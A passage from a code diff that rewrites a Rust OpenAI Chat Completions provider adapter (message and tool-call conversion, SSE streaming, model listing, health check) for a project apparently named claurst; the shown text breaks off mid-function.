c.as_str()) { - if !text.is_empty() { - content_blocks.push(ContentBlock::Text { - text: text.to_string(), - }); - } - } - - // Tool calls - if let Some(tool_calls) = message.get("tool_calls").and_then(|t| t.as_array()) { - for tc in tool_calls { - let id = tc - .get("id") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - let name = tc - .get("function") - .and_then(|f| f.get("name")) - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - let args_str = tc - .get("function") - .and_then(|f| f.get("arguments")) - .and_then(|v| v.as_str()) - .unwrap_or("{}"); - let input: Value = - serde_json::from_str(args_str).unwrap_or(json!({})); - content_blocks.push(ContentBlock::ToolUse { id, name, input }); - } - } - - let finish_reason = choice - .get("finish_reason") - .and_then(|v| v.as_str()) - .unwrap_or("stop"); - let stop_reason = Self::map_finish_reason(finish_reason); - - let usage = Self::parse_usage(json.get("usage")); - - Ok(ProviderResponse { - id, - content: content_blocks, - stop_reason, - usage, - model, - }) - } - - // ----------------------------------------------------------------------- - // Streaming helpers - // ----------------------------------------------------------------------- - - fn map_finish_reason(reason: &str) -> StopReason { - match reason { - "stop" => StopReason::EndTurn, - "length" => StopReason::MaxTokens, - "tool_calls" | "function_call" => StopReason::ToolUse, - "content_filter" => StopReason::ContentFiltered, - other => StopReason::Other(other.to_string()), - } - } - - fn parse_usage(usage: Option<&Value>) -> UsageInfo { - let u = match usage { - Some(v) => v, - None => return UsageInfo::default(), - }; - UsageInfo { - input_tokens: u - .get("prompt_tokens") - .and_then(|v| v.as_u64()) - .unwrap_or(0), - output_tokens: u - .get("completion_tokens") - .and_then(|v| v.as_u64()) - .unwrap_or(0), - cache_creation_input_tokens: 0, - cache_read_input_tokens: 0, - } - } - - // ----------------------------------------------------------------------- - // Streaming create_message_stream - // ----------------------------------------------------------------------- - - async fn do_streaming( - &self, - request: &ProviderRequest, - ) -> Result { - let messages = Self::to_openai_messages( - &request.messages, - request.system_prompt.as_ref(), - ); - let tools = Self::to_openai_tools(&request.tools); - - let mut body = json!({ - "model": request.model, - "max_tokens": request.max_tokens, - "messages": messages, - "stream": true, - "stream_options": { "include_usage": true }, - "store": false, - }); - - if !tools.is_empty() { - body["tools"] = json!(tools); - } - if let Some(t) = request.temperature { - body["temperature"] = json!(t); - } - if let Some(p) = request.top_p { - body["top_p"] = json!(p); - } - if !request.stop_sequences.is_empty() { - body["stop"] = json!(request.stop_sequences); - } - merge_openai_compatible_options(&mut body, &request.provider_options); - - let (auth_key, auth_val) = self.auth_header(); - let url = format!("{}/v1/chat/completions", self.base_url); - - let resp = self - .http_client - .post(&url) - .header(auth_key, auth_val) - .header("Content-Type", "application/json") - .header("Accept", "text/event-stream") - .json(&body) - .send() - .await - .map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("HTTP request failed: {}", e), - status: None, - body: None, - })?; - - let status = resp.status().as_u16(); - if !(200..300).contains(&(status as usize)) { - let text = resp.text().await.unwrap_or_default(); - return Err(self.map_http_error(status, &text)); - } - - Ok(resp) - } -} - -#[cfg(test)] -mod tests { - use super::*; - use claurst_core::types::Message; - - #[test] - fn user_tool_results_become_tool_messages() { - let messages = vec![ - Message::assistant_blocks(vec![ContentBlock::ToolUse { - id: "call_1".to_string(), - name: "search".to_string(), - input: json!({ "q": "test" }), - }]), - Message::user_blocks(vec![ContentBlock::ToolResult { - tool_use_id: "call_1".to_string(), - content: ToolResultContent::Text("done".to_string()), - is_error: Some(false), - }]), - ]; - - let wire = OpenAiProvider::to_openai_messages(&messages, None); - assert_eq!(wire.len(), 2); - assert_eq!(wire[0].get("role").and_then(|v| v.as_str()), Some("assistant")); - assert_eq!(wire[1].get("role").and_then(|v| v.as_str()), Some("tool")); - assert_eq!(wire[1].get("tool_call_id").and_then(|v| v.as_str()), Some("call_1")); - assert_eq!(wire[1].get("content").and_then(|v| v.as_str()), Some("done")); - } - - #[test] - fn mixed_user_content_flushes_before_tool_result() { - let messages = vec![Message::user_blocks(vec![ - ContentBlock::Text { - text: "preface".to_string(), - }, - ContentBlock::ToolResult { - tool_use_id: "call_2".to_string(), - content: ToolResultContent::Text("ok".to_string()), - is_error: Some(false), - }, - ])]; - - let wire = OpenAiProvider::to_openai_messages(&messages, None); - assert_eq!(wire.len(), 2); - assert_eq!(wire[0].get("role").and_then(|v| v.as_str()), Some("user")); - assert_eq!(wire[1].get("role").and_then(|v| v.as_str()), Some("tool")); - assert_eq!(wire[1].get("tool_call_id").and_then(|v| v.as_str()), Some("call_2")); - } -} - -// --------------------------------------------------------------------------- -// LlmProvider impl -// --------------------------------------------------------------------------- - -#[async_trait] -impl LlmProvider for OpenAiProvider { - fn id(&self) -> &ProviderId { - &self.id - } - - fn name(&self) -> &str { - &self.name - } - - async fn create_message( - &self, - request: ProviderRequest, - ) -> Result { - if Self::use_responses_api(&request.model) { - return Err(ProviderError::InvalidRequest { - provider: self.id.clone(), - message: format!( - "Model '{}' requires the OpenAI Responses API which is not yet fully \ - implemented. Use gpt-4o or gpt-4o-mini for now, or set \ - OPENAI_BASE_URL to a compatible endpoint.", - request.model - ), - }); - } - self.create_message_non_streaming(&request).await - } - - async fn create_message_stream( - &self, - request: ProviderRequest, - ) -> Result> + Send>>, ProviderError> - { - if Self::use_responses_api(&request.model) { - return Err(ProviderError::InvalidRequest { - provider: self.id.clone(), - message: format!( - "Model '{}' requires the OpenAI Responses API which is not yet fully \ - implemented. Use gpt-4o or gpt-4o-mini for now, or set \ - OPENAI_BASE_URL to a compatible endpoint.", - request.model - ), - }); - } - let resp = self.do_streaming(&request).await?; - let provider_id = self.id.clone(); - - // We need the message ID to emit MessageStart. We'll generate one on - // the first chunk that carries it. - let s = stream! { - use futures::StreamExt; - - let mut byte_stream = resp.bytes_stream(); - let mut leftover = String::new(); - - // State carried across chunks - let mut message_started = false; - let mut message_id = String::from("unknown"); - let mut model_name = String::new(); - // Track accumulating tool call argument buffers: index -> (id, name, buf) - let mut tool_call_buffers: std::collections::HashMap< - usize, - (String, String, String), - > = std::collections::HashMap::new(); - - while let Some(chunk_result) = byte_stream.next().await { - let chunk = match chunk_result { - Ok(c) => c, - Err(e) => { - yield Err(ProviderError::StreamError { - provider: provider_id.clone(), - message: format!("Stream read error: {}", e), - partial_response: None, - }); - return; - } - }; - - let text = String::from_utf8_lossy(&chunk); - let combined = if leftover.is_empty() { - text.to_string() - } else { - let mut s = std::mem::take(&mut leftover); - s.push_str(&text); - s - }; - - let mut lines: Vec<&str> = combined.split('\n').collect(); - if !combined.ends_with('\n') { - leftover = lines.pop().unwrap_or("").to_string(); - } - - for line in lines { - let line = line.trim_end_matches('\r').trim(); - - // Skip SSE comment lines and blank lines that are not data. - if line.is_empty() || line.starts_with(':') { - continue; - } - - let data = if let Some(rest) = line.strip_prefix("data:") { - rest.trim() - } else { - continue; - }; - - if data == "[DONE]" { - yield Ok(StreamEvent::MessageStop); - return; - } - - let chunk_json: Value = match serde_json::from_str(data) { - Ok(v) => v, - Err(e) => { - debug!("Failed to parse OpenAI SSE chunk: {}: {}", e, data); - continue; - } - }; - - // Extract message id and model on first chunk. - if !message_started { - if let Some(id) = chunk_json.get("id").and_then(|v| v.as_str()) { - message_id = id.to_string(); - } - if let Some(m) = chunk_json.get("model").and_then(|v| v.as_str()) { - model_name = m.to_string(); - } - // Emit MessageStart — usage will be filled in later from - // the final chunk; emit zeros for now. - yield Ok(StreamEvent::MessageStart { - id: message_id.clone(), - model: model_name.clone(), - usage: UsageInfo::default(), - }); - // Emit ContentBlockStart for the text block (index 0). - yield Ok(StreamEvent::ContentBlockStart { - index: 0, - content_block: ContentBlock::Text { text: String::new() }, - }); - message_started = true; - } - - let choices = match chunk_json.get("choices").and_then(|c| c.as_array()) { - Some(c) => c, - None => { - // May be a usage-only chunk (the final one). - if let Some(usage_val) = chunk_json.get("usage") { - let usage = OpenAiProvider::parse_usage(Some(usage_val)); - yield Ok(StreamEvent::MessageDelta { - stop_reason: None, - usage: Some(usage), - }); - } - continue; - } - }; - - let choice = match choices.first() { - Some(c) => c, - None => continue, - }; - - let delta = match choice.get("delta") { - Some(d) => d, - None => continue, - }; - - // Text content delta - if let Some(content) = delta.get("content").and_then(|c| c.as_str()) { - if !content.is_empty() { - yield Ok(StreamEvent::TextDelta { - index: 0, - text: content.to_string(), - }); - } - } - - // Tool call deltas - if let Some(tool_calls) = - delta.get("tool_calls").and_then(|t| t.as_array()) - { - for tc in tool_calls { - let tc_index = tc - .get("index") - .and_then(|v| v.as_u64()) - .unwrap_or(0) as usize; - // OpenAI sends id/name only on the first chunk for each tool call. - if let Some(tc_id) = - tc.get("id").and_then(|v| v.as_str()) - { - let name = tc - .get("function") - .and_then(|f| f.get("name")) - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - // OpenAI tool calls sit after the text block. - // Use index 1 + tc_index. - let block_index = 1 + tc_index; - tool_call_buffers.insert( - block_index, - (tc_id.to_string(), name.clone(), String::new()), - ); - yield Ok(StreamEvent::ContentBlockStart { - index: block_index, - content_block: ContentBlock::ToolUse { - id: tc_id.to_string(), - name, - input: json!({}), - }, - }); - } - // Argument fragment - if let Some(args_frag) = tc - .get("function") - .and_then(|f| f.get("arguments")) - .and_then(|v| v.as_str()) - { - if !args_frag.is_empty() { - let block_index = 1 + tc_index; - if let Some((_, _, buf)) = - tool_call_buffers.get_mut(&block_index) - { - buf.push_str(args_frag); - } - yield Ok(StreamEvent::InputJsonDelta { - index: block_index, - partial_json: args_frag.to_string(), - }); - } - } - } - } - - // finish_reason signals end of message. - if let Some(finish_reason) = - choice.get("finish_reason").and_then(|v| v.as_str()) - { - if !finish_reason.is_empty() && finish_reason != "null" { - // Close the text content block. - yield Ok(StreamEvent::ContentBlockStop { index: 0 }); - // Close any open tool call blocks. - let mut tc_indices: Vec = - tool_call_buffers.keys().cloned().collect(); - tc_indices.sort(); - for idx in tc_indices { - yield Ok(StreamEvent::ContentBlockStop { index: idx }); - } - - let stop_reason = - OpenAiProvider::map_finish_reason(finish_reason); - - // Usage might come in the same chunk or a later one. - let usage_val = chunk_json.get("usage"); - let usage = usage_val.map(|u| OpenAiProvider::parse_usage(Some(u))); - - yield Ok(StreamEvent::MessageDelta { - stop_reason: Some(stop_reason), - usage, - }); - } - } - } - } - - // If we consumed all bytes without seeing [DONE], emit stop. - if message_started { - yield Ok(StreamEvent::MessageStop); - } - }; - - Ok(Box::pin(s)) - } - - async fn list_models(&self) -> Result, ProviderError> { - let (auth_key, auth_val) = self.auth_header(); - let url = format!("{}/v1/models", self.base_url); - - let resp = self - .http_client - .get(&url) - .header(auth_key, auth_val) - .send() - .await - .map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("HTTP request failed: {}", e), - status: None, - body: None, - })?; - - let status = resp.status().as_u16(); - let text = resp.text().await.map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to read response body: {}", e), - status: Some(status), - body: None, - })?; - - if !(200..300).contains(&(status as usize)) { - return Err(self.map_http_error(status, &text)); - } - - let json: Value = - serde_json::from_str(&text).map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to parse models JSON: {}", e), - status: Some(status), - body: Some(text), - })?; - - let data = match json.get("data").and_then(|d| d.as_array()) { - Some(d) => d, - None => return Ok(vec![]), - }; - - let provider_id = self.id.clone(); - let models: Vec = data - .iter() - .filter_map(|m| { - let id = m.get("id").and_then(|v| v.as_str())?; - // Only return GPT, O3, O4 family models. - if !id.starts_with("gpt-") - && !id.starts_with("o3") - && !id.starts_with("o4") - && !id.starts_with("o1") - { - return None; - } - Some(ModelInfo { - id: ModelId::new(id), - provider_id: provider_id.clone(), - name: id.to_string(), - context_window: match id { - "gpt-5" | "gpt-5.4" | "gpt-5.2" | "gpt-5-mini" | "gpt-5-nano" - | "gpt-5-chat-latest" - | "gpt-5.2-codex" | "gpt-5.1-codex" | "gpt-5.1-codex-mini" - | "gpt-5.1-codex-max" => 400_000, - "o3" | "o3-mini" | "o4-mini" => 200_000, - _ => 128_000, - }, - max_output_tokens: 16_384, - }) - }) - .collect(); - - Ok(models) - } - - async fn health_check(&self) -> Result { - let (auth_key, auth_val) = self.auth_header(); - let url = format!("{}/v1/models", self.base_url); - - let resp = self - .http_client - .get(&url) - .header(auth_key, auth_val) - .send() - .await; - - match resp { - Ok(r) if r.status().is_success() => Ok(ProviderStatus::Healthy), - Ok(r) => Ok(ProviderStatus::Unavailable { - reason: format!("models endpoint returned {}", r.status()), - }), - Err(e) => Ok(ProviderStatus::Unavailable { - reason: e.to_string(), - }), - } - } - - fn capabilities(&self) -> ProviderCapabilities { - ProviderCapabilities { - streaming: true, - tool_calling: true, - thinking: false, - image_input: true, - pdf_input: false, - audio_input: false, - video_input: false, - caching: false, - structured_output: true, - system_prompt_style: SystemPromptStyle::SystemMessage, - } - } -} +// providers/openai.rs — OpenAI Chat Completions provider adapter. +// +// Implements LlmProvider for the OpenAI Chat Completions API (POST +// /v1/chat/completions). Works equally well for any OpenAI-compatible +// endpoint (e.g. Azure OpenAI, local Ollama, Together AI) by configuring +// `base_url`. +// +// Phase 2A implementation covers: +// - Request transformation (Anthropic internal types → OpenAI wire format) +// - Streaming via Server-Sent Events (data: {...}\n\n lines) +// - Non-streaming JSON response parsing +// - Tool-call support (request and response) +// - Model listing via GET /v1/models +// - Health check +// - ProviderCapabilities + +use async_stream::stream; +use async_trait::async_trait; +use claurst_core::provider_id::{ModelId, ProviderId}; +use claurst_core::types::{ + ContentBlock, ImageSource, MessageContent, Role, ToolResultContent, UsageInfo, +}; +use futures::Stream; +use serde_json::{json, Value}; +use std::pin::Pin; +use tracing::debug; + +use crate::error_handling::parse_error_response; +use crate::provider::{LlmProvider, ModelInfo}; +use crate::provider_error::ProviderError; +use crate::provider_types::SystemPrompt; +use crate::provider_types::{ + ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason, + StreamEvent, SystemPromptStyle, +}; + +use super::request_options::merge_openai_compatible_options; + +// --------------------------------------------------------------------------- +// OpenAiProvider +// --------------------------------------------------------------------------- + +pub struct OpenAiProvider { + id: ProviderId, + name: String, + base_url: String, + api_key: String, + http_client: reqwest::Client, +} + +impl OpenAiProvider { + pub fn new(api_key: String) -> Self { + let http_client = reqwest::Client::builder() + .timeout(std::time::Duration::from_secs(600)) + .build() + .expect("failed to build reqwest client"); + + Self { + id: ProviderId::new(ProviderId::OPENAI), + name: "OpenAI".to_string(), + base_url: "https://api.openai.com".to_string(), + api_key, + http_client, + } + } + + /// Override the API base URL (e.g. for Azure, Ollama, or other compatible + /// endpoints). + pub fn with_base_url(mut self, url: String) -> Self { + self.base_url = url; + self + } + + /// Returns `true` if the model should use the Responses API instead of + /// Chat Completions (gpt-5+, o3, o4-mini). + fn use_responses_api(model: &str) -> bool { + model.starts_with("o3") || model.starts_with("o4") || model.starts_with("gpt-5") + } + + // ----------------------------------------------------------------------- + // Request transformation helpers + // ----------------------------------------------------------------------- + + /// Public wrapper for Azure/Copilot providers that share the OpenAI wire format. + pub fn to_openai_messages_pub( + messages: &[claurst_core::types::Message], + system_prompt: Option<&SystemPrompt>, + ) -> Vec { + Self::to_openai_messages(messages, system_prompt) + } + + /// Public wrapper for tool conversion used by Azure/Copilot providers. + pub fn to_openai_tools_pub(tools: &[claurst_core::types::ToolDefinition]) -> Vec { + Self::to_openai_tools(tools) + } + + /// Public wrapper for finish-reason mapping. + pub fn map_finish_reason_pub(reason: &str) -> StopReason { + Self::map_finish_reason(reason) + } + + /// Public wrapper for usage parsing. + pub fn parse_usage_pub(usage: Option<&Value>) -> UsageInfo { + Self::parse_usage(usage) + } + + /// Public wrapper for non-streaming response parsing. + pub fn parse_non_streaming_response_pub( + json: &Value, + provider_id: &claurst_core::provider_id::ProviderId, + ) -> Result { + Self::parse_non_streaming_response(json, provider_id) + } + + /// Convert a provider-agnostic [`ProviderRequest`] into the OpenAI Chat + /// Completions `messages` array. + fn to_openai_messages( + messages: &[claurst_core::types::Message], + system_prompt: Option<&SystemPrompt>, + ) -> Vec { + let mut result: Vec = Vec::new(); + + // System prompt goes first as a `system` role message. + if let Some(sys) = system_prompt { + let sys_text = match sys { + SystemPrompt::Text(t) => t.clone(), + SystemPrompt::Blocks(blocks) => blocks + .iter() + .map(|b| b.text.clone()) + .collect::>() + .join("\n"), + }; + result.push(json!({ "role": "system", "content": sys_text })); + } + + for msg in messages { + match msg.role { + Role::User => { + Self::append_user_messages(&mut result, &msg.content); + } + Role::Assistant => { + let (text_content, tool_calls) = + Self::assistant_content_to_openai(&msg.content); + let mut obj = serde_json::Map::new(); + obj.insert("role".into(), json!("assistant")); + if let Some(tc) = text_content { + obj.insert("content".into(), json!(tc)); + } else { + obj.insert("content".into(), Value::Null); + } + if !tool_calls.is_empty() { + obj.insert("tool_calls".into(), json!(tool_calls)); + } + result.push(Value::Object(obj)); + + // ToolResult blocks in an assistant message need to be + // emitted as separate `role: tool` messages. + let tool_results = Self::extract_tool_results(&msg.content); + result.extend(tool_results); + } + } + } + + result + } + + fn append_user_messages(result: &mut Vec, content: &MessageContent) { + match content { + MessageContent::Text(text) => { + result.push(json!({ "role": "user", "content": text })); + } + MessageContent::Blocks(blocks) => { + let mut user_parts: Vec = Vec::new(); + let flush_user_parts = |result: &mut Vec, parts: &mut Vec| { + if !parts.is_empty() { + result.push(json!({ + "role": "user", + "content": std::mem::take(parts), + })); + } + }; + + for block in blocks { + if let Some(tool_result) = Self::tool_result_to_openai_message(block) { + flush_user_parts(result, &mut user_parts); + result.push(tool_result); + } else if let Some(part) = Self::user_block_to_openai_part(block) { + user_parts.push(part); + } + } + + flush_user_parts(result, &mut user_parts); + } + } + } + + fn user_block_to_openai_part(block: &ContentBlock) -> Option { + match block { + ContentBlock::Text { text } => Some(json!({ "type": "text", "text": text })), + ContentBlock::Image { source } => { + let url = Self::image_source_to_url(source); + Some(json!({ + "type": "image_url", + "image_url": { "url": url } + })) + } + ContentBlock::ToolResult { + tool_use_id, + content, + is_error, + } => { + // Tool results become separate `role: tool` messages at the + // conversation level — handled in append_user_messages. + let _ = (tool_use_id, content, is_error); + None + } + // Thinking, RedactedThinking, etc. are not supported by OpenAI. + _ => None, + } + } + + fn image_source_to_url(source: &ImageSource) -> String { + if let Some(url) = &source.url { + return url.clone(); + } + // base64-encoded image + let media_type = source.media_type.as_deref().unwrap_or("image/png"); + let data = source.data.as_deref().unwrap_or(""); + format!("data:{};base64,{}", media_type, data) + } + + /// Split assistant content blocks into (text_string, tool_calls_array). + fn assistant_content_to_openai(content: &MessageContent) -> (Option, Vec) { + let blocks = match content { + MessageContent::Text(t) => return (Some(t.clone()), vec![]), + MessageContent::Blocks(b) => b, + }; + + let mut text_parts: Vec<&str> = Vec::new(); + let mut tool_calls: Vec = Vec::new(); + + for block in blocks { + match block { + ContentBlock::Text { text } => { + text_parts.push(text.as_str()); + } + ContentBlock::ToolUse { id, name, input } => { + let args = serde_json::to_string(input).unwrap_or_default(); + tool_calls.push(json!({ + "id": id, + "type": "function", + "function": { + "name": name, + "arguments": args + } + })); + } + // Thinking is dropped — not supported by OpenAI. + _ => {} + } + } + + let text_content = if text_parts.is_empty() { + None + } else { + Some(text_parts.join("")) + }; + + (text_content, tool_calls) + } + + /// Collect any ToolResult blocks and emit them as `role: tool` messages. + fn extract_tool_results(content: &MessageContent) -> Vec { + let blocks = match content { + MessageContent::Text(_) => return vec![], + MessageContent::Blocks(b) => b, + }; + + blocks + .iter() + .filter_map(Self::tool_result_to_openai_message) + .collect() + } + + fn tool_result_to_openai_message(block: &ContentBlock) -> Option { + let ContentBlock::ToolResult { + tool_use_id, + content, + .. + } = block + else { + return None; + }; + + let text = match content { + ToolResultContent::Text(t) => t.clone(), + ToolResultContent::Blocks(inner) => inner + .iter() + .filter_map(|b| { + if let ContentBlock::Text { text } = b { + Some(text.as_str()) + } else { + None + } + }) + .collect::>() + .join("\n"), + }; + + Some(json!({ + "role": "tool", + "tool_call_id": tool_use_id, + "content": text, + })) + } + + /// Convert tool definitions to the OpenAI `tools` array format. + fn to_openai_tools(tools: &[claurst_core::types::ToolDefinition]) -> Vec { + tools + .iter() + .map(|td| { + json!({ + "type": "function", + "function": { + "name": td.name, + "description": td.description, + "parameters": td.input_schema + } + }) + }) + .collect() + } + + // ----------------------------------------------------------------------- + // HTTP helpers + // ----------------------------------------------------------------------- + + fn auth_header(&self) -> (&'static str, String) { + ("Authorization", format!("Bearer {}", self.api_key)) + } + + fn map_http_error(&self, status: u16, body: &str) -> ProviderError { + parse_error_response(status, body, &self.id) + } + + // ----------------------------------------------------------------------- + // Non-streaming create_message + // ----------------------------------------------------------------------- + + async fn create_message_non_streaming( + &self, + request: &ProviderRequest, + ) -> Result { + let messages = Self::to_openai_messages(&request.messages, request.system_prompt.as_ref()); + let tools = Self::to_openai_tools(&request.tools); + + let mut body = json!({ + "model": request.model, + "max_tokens": request.max_tokens, + "messages": messages, + "stream": false, + "store": false, + }); + + if !tools.is_empty() { + body["tools"] = json!(tools); + } + if let Some(t) = request.temperature { + body["temperature"] = json!(t); + } + if let Some(p) = request.top_p { + body["top_p"] = json!(p); + } + if !request.stop_sequences.is_empty() { + body["stop"] = json!(request.stop_sequences); + } + merge_openai_compatible_options(&mut body, &request.provider_options); + + let (auth_key, auth_val) = self.auth_header(); + let url = format!("{}/v1/chat/completions", self.base_url); + + let resp = self + .http_client + .post(&url) + .header(auth_key, auth_val) + .header("Content-Type", "application/json") + .json(&body) + .send() + .await + .map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("HTTP request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + let text = resp.text().await.map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to read response body: {}", e), + status: Some(status), + body: None, + })?; + + if !(200..300).contains(&(status as usize)) { + return Err(self.map_http_error(status, &text)); + } + + let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to parse response JSON: {}", e), + status: Some(status), + body: Some(text.clone()), + })?; + + Self::parse_non_streaming_response(&json, &self.id) + } + + fn parse_non_streaming_response( + json: &Value, + provider_id: &ProviderId, + ) -> Result { + let id = json + .get("id") + .and_then(|v| v.as_str()) + .unwrap_or("unknown") + .to_string(); + let model = json + .get("model") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let choice = json + .get("choices") + .and_then(|c| c.as_array()) + .and_then(|a| a.first()) + .ok_or_else(|| ProviderError::Other { + provider: provider_id.clone(), + message: "No choices in response".to_string(), + status: None, + body: None, + })?; + + let message = choice.get("message").ok_or_else(|| ProviderError::Other { + provider: provider_id.clone(), + message: "No message in choice".to_string(), + status: None, + body: None, + })?; + + let mut content_blocks: Vec = Vec::new(); + + // Text content + if let Some(text) = message.get("content").and_then(|c| c.as_str()) { + if !text.is_empty() { + content_blocks.push(ContentBlock::Text { + text: text.to_string(), + }); + } + } + + // Tool calls + if let Some(tool_calls) = message.get("tool_calls").and_then(|t| t.as_array()) { + for tc in tool_calls { + let id = tc + .get("id") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let name = tc + .get("function") + .and_then(|f| f.get("name")) + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let args_str = tc + .get("function") + .and_then(|f| f.get("arguments")) + .and_then(|v| v.as_str()) + .unwrap_or("{}"); + let input: Value = serde_json::from_str(args_str).unwrap_or(json!({})); + content_blocks.push(ContentBlock::ToolUse { id, name, input }); + } + } + + let finish_reason = choice + .get("finish_reason") + .and_then(|v| v.as_str()) + .unwrap_or("stop"); + let stop_reason = Self::map_finish_reason(finish_reason); + + let usage = Self::parse_usage(json.get("usage")); + + Ok(ProviderResponse { + id, + content: content_blocks, + stop_reason, + usage, + model, + }) + } + + // ----------------------------------------------------------------------- + // Streaming helpers + // ----------------------------------------------------------------------- + + fn map_finish_reason(reason: &str) -> StopReason { + match reason { + "stop" => StopReason::EndTurn, + "length" => StopReason::MaxTokens, + "tool_calls" | "function_call" => StopReason::ToolUse, + "content_filter" => StopReason::ContentFiltered, + other => StopReason::Other(other.to_string()), + } + } + + fn parse_usage(usage: Option<&Value>) -> UsageInfo { + let u = match usage { + Some(v) => v, + None => return UsageInfo::default(), + }; + UsageInfo { + input_tokens: u.get("prompt_tokens").and_then(|v| v.as_u64()).unwrap_or(0), + output_tokens: u + .get("completion_tokens") + .and_then(|v| v.as_u64()) + .unwrap_or(0), + cache_creation_input_tokens: 0, + cache_read_input_tokens: 0, + } + } + + // ----------------------------------------------------------------------- + // Streaming create_message_stream + // ----------------------------------------------------------------------- + + async fn do_streaming( + &self, + request: &ProviderRequest, + ) -> Result { + let messages = Self::to_openai_messages(&request.messages, request.system_prompt.as_ref()); + let tools = Self::to_openai_tools(&request.tools); + + let mut body = json!({ + "model": request.model, + "max_tokens": request.max_tokens, + "messages": messages, + "stream": true, + "stream_options": { "include_usage": true }, + "store": false, + }); + + if !tools.is_empty() { + body["tools"] = json!(tools); + } + if let Some(t) = request.temperature { + body["temperature"] = json!(t); + } + if let Some(p) = request.top_p { + body["top_p"] = json!(p); + } + if !request.stop_sequences.is_empty() { + body["stop"] = json!(request.stop_sequences); + } + merge_openai_compatible_options(&mut body, &request.provider_options); + + let (auth_key, auth_val) = self.auth_header(); + let url = format!("{}/v1/chat/completions", self.base_url); + + let resp = self + .http_client + .post(&url) + .header(auth_key, auth_val) + .header("Content-Type", "application/json") + .header("Accept", "text/event-stream") + .json(&body) + .send() + .await + .map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("HTTP request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + if !(200..300).contains(&(status as usize)) { + let text = resp.text().await.unwrap_or_default(); + return Err(self.map_http_error(status, &text)); + } + + Ok(resp) + } +} + +// --------------------------------------------------------------------------- +// LlmProvider impl +// --------------------------------------------------------------------------- + +#[async_trait] +impl LlmProvider for OpenAiProvider { + fn id(&self) -> &ProviderId { + &self.id + } + + fn name(&self) -> &str { + &self.name + } + + async fn create_message( + &self, + request: ProviderRequest, + ) -> Result { + if Self::use_responses_api(&request.model) { + return Err(ProviderError::InvalidRequest { + provider: self.id.clone(), + message: format!( + "Model '{}' requires the OpenAI Responses API which is not yet fully \ + implemented. Use gpt-4o or gpt-4o-mini for now, or set \ + OPENAI_BASE_URL to a compatible endpoint.", + request.model + ), + }); + } + self.create_message_non_streaming(&request).await + } + + async fn create_message_stream( + &self, + request: ProviderRequest, + ) -> Result> + Send>>, ProviderError> + { + if Self::use_responses_api(&request.model) { + return Err(ProviderError::InvalidRequest { + provider: self.id.clone(), + message: format!( + "Model '{}' requires the OpenAI Responses API which is not yet fully \ + implemented. Use gpt-4o or gpt-4o-mini for now, or set \ + OPENAI_BASE_URL to a compatible endpoint.", + request.model + ), + }); + } + let resp = self.do_streaming(&request).await?; + let provider_id = self.id.clone(); + + // We need the message ID to emit MessageStart. We'll generate one on + // the first chunk that carries it. + let s = stream! { + use futures::StreamExt; + + let mut byte_stream = resp.bytes_stream(); + let mut leftover = String::new(); + + // State carried across chunks + let mut message_started = false; + let mut message_id = String::from("unknown"); + let mut model_name = String::new(); + // Track accumulating tool call argument buffers: index -> (id, name, buf) + let mut tool_call_buffers: std::collections::HashMap< + usize, + (String, String, String), + > = std::collections::HashMap::new(); + + while let Some(chunk_result) = byte_stream.next().await { + let chunk = match chunk_result { + Ok(c) => c, + Err(e) => { + yield Err(ProviderError::StreamError { + provider: provider_id.clone(), + message: format!("Stream read error: {}", e), + partial_response: None, + }); + return; + } + }; + + let text = String::from_utf8_lossy(&chunk); + let combined = if leftover.is_empty() { + text.to_string() + } else { + let mut s = std::mem::take(&mut leftover); + s.push_str(&text); + s + }; + + let mut lines: Vec<&str> = combined.split('\n').collect(); + if !combined.ends_with('\n') { + leftover = lines.pop().unwrap_or("").to_string(); + } + + for line in lines { + let line = line.trim_end_matches('\r').trim(); + + // Skip SSE comment lines and blank lines that are not data. + if line.is_empty() || line.starts_with(':') { + continue; + } + + let data = if let Some(rest) = line.strip_prefix("data:") { + rest.trim() + } else { + continue; + }; + + if data == "[DONE]" { + yield Ok(StreamEvent::MessageStop); + return; + } + + let chunk_json: Value = match serde_json::from_str(data) { + Ok(v) => v, + Err(e) => { + debug!("Failed to parse OpenAI SSE chunk: {}: {}", e, data); + continue; + } + }; + + // Extract message id and model on first chunk. + if !message_started { + if let Some(id) = chunk_json.get("id").and_then(|v| v.as_str()) { + message_id = id.to_string(); + } + if let Some(m) = chunk_json.get("model").and_then(|v| v.as_str()) { + model_name = m.to_string(); + } + // Emit MessageStart — usage will be filled in later from + // the final chunk; emit zeros for now. + yield Ok(StreamEvent::MessageStart { + id: message_id.clone(), + model: model_name.clone(), + usage: UsageInfo::default(), + }); + // Emit ContentBlockStart for the text block (index 0). + yield Ok(StreamEvent::ContentBlockStart { + index: 0, + content_block: ContentBlock::Text { text: String::new() }, + }); + message_started = true; + } + + let choices = match chunk_json.get("choices").and_then(|c| c.as_array()) { + Some(c) => c, + None => { + // May be a usage-only chunk (the final one). + if let Some(usage_val) = chunk_json.get("usage") { + let usage = OpenAiProvider::parse_usage(Some(usage_val)); + yield Ok(StreamEvent::MessageDelta { + stop_reason: None, + usage: Some(usage), + }); + } + continue; + } + }; + + let choice = match choices.first() { + Some(c) => c, + None => continue, + }; + + let delta = match choice.get("delta") { + Some(d) => d, + None => continue, + }; + + // Text content delta + if let Some(content) = delta.get("content").and_then(|c| c.as_str()) { + if !content.is_empty() { + yield Ok(StreamEvent::TextDelta { + index: 0, + text: content.to_string(), + }); + } + } + + // Tool call deltas + if let Some(tool_calls) = + delta.get("tool_calls").and_then(|t| t.as_array()) + { + for tc in 